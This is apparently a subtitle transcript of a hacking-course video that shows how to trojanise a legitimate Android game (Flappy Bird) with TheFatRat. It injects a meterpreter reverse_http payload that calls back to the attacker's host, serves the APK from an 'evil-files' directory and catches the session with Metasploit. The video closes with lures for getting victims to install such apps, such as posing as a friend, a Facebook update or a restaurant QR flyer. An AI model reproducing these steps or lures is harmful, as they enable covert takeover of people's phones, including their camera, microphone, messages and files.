All language subtitles for 9. Backdooring a Legitimate Android App

1 00:00:00,340 --> 00:00:06,140 In this video, I'd like to show you how to embed evil code into Android apps. 2 00:00:06,240 --> 00:00:12,880 So that when the app is executed on an Android device, the user will see a normal app or normal game 3 00:00:12,880 --> 00:00:17,480 that they can use but at the same time our backdoor will run at the background 4 00:00:17,660 --> 00:00:22,820 and will have full control over that Android device, whether it's a phone, a tablet 5 00:00:22,920 --> 00:00:24,660 or anything that runs Android. 6 00:00:25,240 --> 00:00:30,480 Now doing this is actually not very hard and the first step is you want to go 7 00:00:30,480 --> 00:00:34,700 and download the application that you want the target person to see, 8 00:00:34,880 --> 00:00:38,340 so you want to social engineer them to install that application. 9 00:00:38,540 --> 00:00:44,260 You can use any application you want, so you can just use an application for a restaurant, for example, 10 00:00:44,400 --> 00:00:48,420 and then social engineer your target to install that app to get a certain offer 11 00:00:48,880 --> 00:00:53,340 or you can just backdoor a game and then pretend to be the target person's friend 12 00:00:53,500 --> 00:00:57,040 and send them that game saying, "Oh, look at my new app or new game." 13 00:00:57,820 --> 00:01:02,320 I'm going to go to this website which is called apkmirror.com to download my apk. 14 00:01:02,400 --> 00:01:06,240 Now there's a lot of websites that allow you to do that, but I choose to use this one 15 00:01:06,720 --> 00:01:10,760 and I'm gonna look for a very simple game called Flappy Bird and you've probably heard of it. 16 00:01:14,240 --> 00:01:17,280 You can see I have the game in here, I'm gonna click on it 17 00:01:18,180 --> 00:01:21,480 and then I'm gonna scroll down and download the apk. 
18 00:01:26,100 --> 00:01:29,580 I'm going to click OK to save it and that's it it's saved for me. 19 00:01:29,880 --> 00:01:31,800 So, I'm gonna close this 20 00:01:33,140 --> 00:01:39,900 and if I go to my files, you'll see I'm in my Downloads already and I can see the file right here. 21 00:01:40,460 --> 00:01:45,080 Now I'm going to rename this and I'm just gonna call it 'flappy bird'. 22 00:01:47,060 --> 00:01:48,440 Okay, now this is all good. 23 00:01:49,260 --> 00:01:52,000 Now we can go ahead and generate our backdoor. 24 00:01:53,480 --> 00:01:58,500 We can use TheFatRat to do that and we seen how to install and use TheFatRat before, 25 00:01:58,920 --> 00:02:04,860 but before I do that you need to configure Kali to use Java 8 by default 26 00:02:05,460 --> 00:02:10,420 because by default Kali will use the latest version of Java available 27 00:02:10,660 --> 00:02:17,080 and the latest version cannot be used to recompile the backdoor that we're going to create. 28 00:02:17,900 --> 00:02:25,460 So to change the default version of Java used by Kali you need to type 'update alternatives' 29 00:02:25,960 --> 00:02:30,980 and we're going to say I want to 'config' the 'java' version, 30 00:02:31,640 --> 00:02:32,780 so I'm gonna hit Enter 31 00:02:33,900 --> 00:02:38,900 and as you can see it can list all the Java versions available in Kali Linux 32 00:02:39,460 --> 00:02:46,280 and as you can see we have a star beside the auto mode which we'll choose Java 10 by default. 33 00:02:48,400 --> 00:02:55,300 So what I want to do is I'm going to enter number two to set Kali to use Java 8 by default. 34 00:02:55,960 --> 00:02:59,780 So, all we're gonna do is just enter number 2 and hit Enter. 
35 00:03:00,880 --> 00:03:03,980 This will configure Kali to use Java 8 by default 36 00:03:04,100 --> 00:03:10,000 and this way we'll be able to use Kali to decompile the existing apk that we just downloaded 37 00:03:10,220 --> 00:03:15,740 and then inject a backdoor into it and recompile it to an 'apk' again. 38 00:03:17,000 --> 00:03:20,200 Now TheFatRat is going to do all of this for us, like I said. 39 00:03:20,580 --> 00:03:27,460 So, I'm going to navigate to the directory where I have it installed, which is in opt, TheFatRat 40 00:03:29,000 --> 00:03:33,440 and then we're gonna run it as usual by doing ./fatrat. 41 00:03:38,300 --> 00:03:43,700 Now, I want to generate an Android backdoor, so that's going to be number five here 42 00:03:45,880 --> 00:03:51,980 and the first thing it's asking me for my IP address as you can see it's automatically suggesting 43 00:03:51,980 --> 00:03:54,720 that my IP address is this, which is correct. 44 00:03:55,140 --> 00:04:00,560 If you're not sure about your IP address, you can split the screen, run 'ifconfig' and see the IP 45 00:04:00,660 --> 00:04:01,940 and we've seen this before. 46 00:04:02,600 --> 00:04:08,020 And you can probably notice that my IP right now is different than the NAT network IP. 47 00:04:08,400 --> 00:04:15,220 This is because I'm going to be targeting an android device connected to my Wi-Fi network. 48 00:04:15,740 --> 00:04:23,520 Therefore, I set my network settings, so if we go here, go to devices go to network 49 00:04:23,520 --> 00:04:30,540 and click on network settings, you'll see I have the network settings set to use a bridged adapter. 50 00:04:31,160 --> 00:04:37,340 So, basically what I have right now is my host machine and my target Android device 51 00:04:37,340 --> 00:04:45,020 both connected to the same Wi-Fi network and this virtual machine Kali is set to use a bridged adapter. 
52 00:04:45,020 --> 00:04:50,680 That's why it's getting an IP that is within the subnet of the Wi-Fi network 53 00:04:50,680 --> 00:04:56,160 and this way I'll be able to hack any computer connected to my Wi-Fi network. 54 00:04:57,360 --> 00:05:01,200 Now, you can also run this attack and all the other attacks that you seen so far 55 00:05:01,200 --> 00:05:04,140 on computers connected to different networks, 56 00:05:04,560 --> 00:05:07,240 but we're going to talk about that later on in the course. 57 00:05:07,440 --> 00:05:12,520 For now, we're just gonna focus on hacking computers connected to the same network 58 00:05:12,520 --> 00:05:14,140 or to the NAT network. 59 00:05:15,320 --> 00:05:20,700 So I'm gonna put the IP as shown in here, which is 192.168.0.38, 60 00:05:22,380 --> 00:05:28,680 then it's asking me for the port that I want to use on my payload and I'm gonna set this to '8080'. 61 00:05:30,080 --> 00:05:33,860 Now, it's asking me for the app or the game that I want to backdoor 62 00:05:34,300 --> 00:05:41,000 and as we seen before this is in my Downloads and it's called flappybird.apk 63 00:05:42,540 --> 00:05:48,420 So we're gonna set the path root/Downloads/flappybird.apk. 
64 00:05:49,380 --> 00:05:54,660 I'm gonna hit Enter and it's going to ask me what payload do I want to use, 65 00:05:55,040 --> 00:06:00,380 we're going to use android/meterpreter/reverse_http, so I'm gonna put number 1, 66 00:06:02,660 --> 00:06:07,780 then it's gonna ask me for the method that it should use to backdoor the apk 67 00:06:08,020 --> 00:06:10,980 and we're going to use number one for the latest method 68 00:06:11,720 --> 00:06:17,780 and now TheFatRat is going to first of all create an 'apk' backdoor, decompile the app, 69 00:06:17,860 --> 00:06:24,520 decompile the backdoor, inject the app into the backdoor, sign the new backdoored app 70 00:06:24,520 --> 00:06:30,520 and then generate an apk that when executed it'll run the apps that we selected, 71 00:06:30,800 --> 00:06:35,380 but at the same time it'll run our backdoor in the background. 72 00:06:36,640 --> 00:06:42,500 So now the backdoor is generated and as you can see it's giving us the path where the backdoor is stored. 73 00:06:43,300 --> 00:06:48,080 So I'm gonna copy this and then it's asking me if I want to start the listener 74 00:06:48,360 --> 00:06:51,140 and I'm gonna say no because I'm gonna do this manually. 75 00:06:52,080 --> 00:06:53,140 So, that's it we're done. 76 00:06:53,140 --> 00:06:58,420 I'm gonna hit Enter and I'm gonna enter '17' to exit TheFatRat. 77 00:07:00,500 --> 00:07:07,400 Now, I want to copy the backdoor that we just generated to my evil files directory, 78 00:07:07,560 --> 00:07:12,840 but I also want to rename it so we know we can use the 'cp' command to copy, 79 00:07:13,240 --> 00:07:19,080 but we can use the 'mv' command to move, so we're going to move a file to another place 80 00:07:19,080 --> 00:07:20,980 and rename it in the process. 
81 00:07:21,520 --> 00:07:28,940 So the file that I want to move is stored in here and it's called app_backdoor.apk 82 00:07:29,640 --> 00:07:37,660 and first of all I want to move this to my var/www/html/evil-files 83 00:07:37,660 --> 00:07:41,740 and I want to call it flappybird.apk. 84 00:07:43,240 --> 00:07:47,580 So, the syntax of this command is very similar to the 'cp' command. 85 00:07:47,980 --> 00:07:51,180 First, you give it the file that you want to move 86 00:07:51,180 --> 00:07:58,200 and second you give it the location where you want to move the file to, followed by the new file name. 87 00:07:58,620 --> 00:08:07,040 So now when I move this file the app_backdoor.apk, when it goes into my var/www/evil-files, 88 00:08:07,180 --> 00:08:11,340 it'll actually be renamed to flappybird.apk. 89 00:08:12,800 --> 00:08:18,700 So I'm gonna hit Enter and that's moved there and now we're ready to go and test the backdoor, 90 00:08:19,280 --> 00:08:23,253 but before we run it as you know, because we're using a reverse connection, 91 00:08:23,260 --> 00:08:27,680 we need to listen for incoming connections and I spent a full lecture 92 00:08:27,680 --> 00:08:31,440 showing you how to do that using Metasploit's multi handler. 93 00:08:31,540 --> 00:08:35,100 So, first I'm gonna do 'msfconsole' to run Metasploit 94 00:08:36,440 --> 00:08:40,280 and I've already configured my handler to use the right options. 95 00:08:40,280 --> 00:08:42,341 If you don't remember how to do this, 96 00:08:42,341 --> 00:08:46,140 please go back and refer to the lecture where I show how to use it. 
97 00:08:47,000 --> 00:08:51,280 So, right now I'm only gonna do show options to show you the right options, 98 00:08:51,880 --> 00:08:57,560 so like we did before you can see that I'm using an exploit multi handler to listen for incoming connections 99 00:08:57,860 --> 00:09:03,280 and I set my payload to android/meterpreter/reverse_http, 100 00:09:03,280 --> 00:09:06,360 the same payload that I picked when I generated the back door 101 00:09:06,460 --> 00:09:11,680 and this is always the same idea, we always pick in the handler the same payload that we pick 102 00:09:11,820 --> 00:09:13,400 when we generate the back door. 103 00:09:14,660 --> 00:09:20,440 You can also see that I set my LHOST to 192.168.0.38 and the port to '8080', 104 00:09:20,620 --> 00:09:24,920 again, the same options that I set when I created my backdoor. 105 00:09:25,640 --> 00:09:28,680 So I'm just going to exploit to listen for incoming connections now 106 00:09:29,180 --> 00:09:30,860 and that's it we're good to go. 107 00:09:31,040 --> 00:09:35,520 Now let's go to the Android device, download the backdoor and see if it works. 108 00:09:36,520 --> 00:09:42,500 Now, right here I have my HTC One device, it's a real Android device, this is not a virtual machine 109 00:09:42,860 --> 00:09:46,700 and this device is connected to my network. 110 00:09:47,400 --> 00:09:49,360 So I'm gonna go to my browser 111 00:09:50,420 --> 00:09:57,260 and I'm just going to download the file, so I want to go to 192.168.0.38 112 00:09:57,480 --> 00:10:04,860 and I want to download the file from evil-files/flappybird.apk. 
113 00:10:09,060 --> 00:10:14,960 Now as you can see the file is downloaded so I'm gonna go from here 114 00:10:15,460 --> 00:10:19,100 and install the file, so I'm just gonna click it to install it 115 00:10:20,680 --> 00:10:24,560 then it's going to show me all the permissions that the file is asking for, 116 00:10:24,560 --> 00:10:28,040 so I'm just going to scroll down and click on install. 117 00:10:29,780 --> 00:10:35,580 Now as you can see we have a normal icon for Flappy Bird and now the app is installed. 118 00:10:35,580 --> 00:10:38,840 So you can open it from here or click on done, I'm just going to do done 119 00:10:39,360 --> 00:10:42,260 and then I'm just going to go on all my applications 120 00:10:43,260 --> 00:10:47,580 and you can see I have the app installed here and it's called Flappy Bird. 121 00:10:47,860 --> 00:10:50,280 So, I'm just gonna tap that to run the app 122 00:10:52,020 --> 00:10:55,920 and you see that I'm just gonna get a normal game, that I can play. 123 00:11:01,560 --> 00:11:09,440 Okay, but if we go back to the Kali machine, you'll see that we got a 'meterpreter' session 124 00:11:09,600 --> 00:11:16,760 from the target device, from the target Android device and I can just do 'sysinfo' to confirm that 125 00:11:17,800 --> 00:11:21,900 and as you can see now I managed to gain full access to this Android device. 126 00:11:22,340 --> 00:11:27,500 Now I can access the camera access the mics and messages, access the files 127 00:11:27,500 --> 00:11:33,720 and do anything I want on that device and we managed to do this using a legitimate app 128 00:11:33,720 --> 00:11:36,780 and we injected our code in that app. 
129 00:11:37,940 --> 00:11:42,300 So this opens a huge number of attack strategies you can pretend to be a friend 130 00:11:42,300 --> 00:11:46,740 and send an app to the person, you can pretend to be Facebook for example and tell the person 131 00:11:46,750 --> 00:11:51,460 there is a new update and download it, you can pretend to be a local restaurant 132 00:11:51,460 --> 00:11:57,380 and send the flyer into the house and ask the person to download a file using a QR code. 133 00:11:57,380 --> 00:12:02,060 There is a huge number of ways to use this to hack into your target. 134 00:12:02,540 --> 00:12:04,600 For now we're not talking about delivery methods, 135 00:12:04,600 --> 00:12:07,640 so yeah I just want to show you the whole technique behind it 136 00:12:07,780 --> 00:12:13,060 and as you can see we can hack into any Android phone using any app that we want.
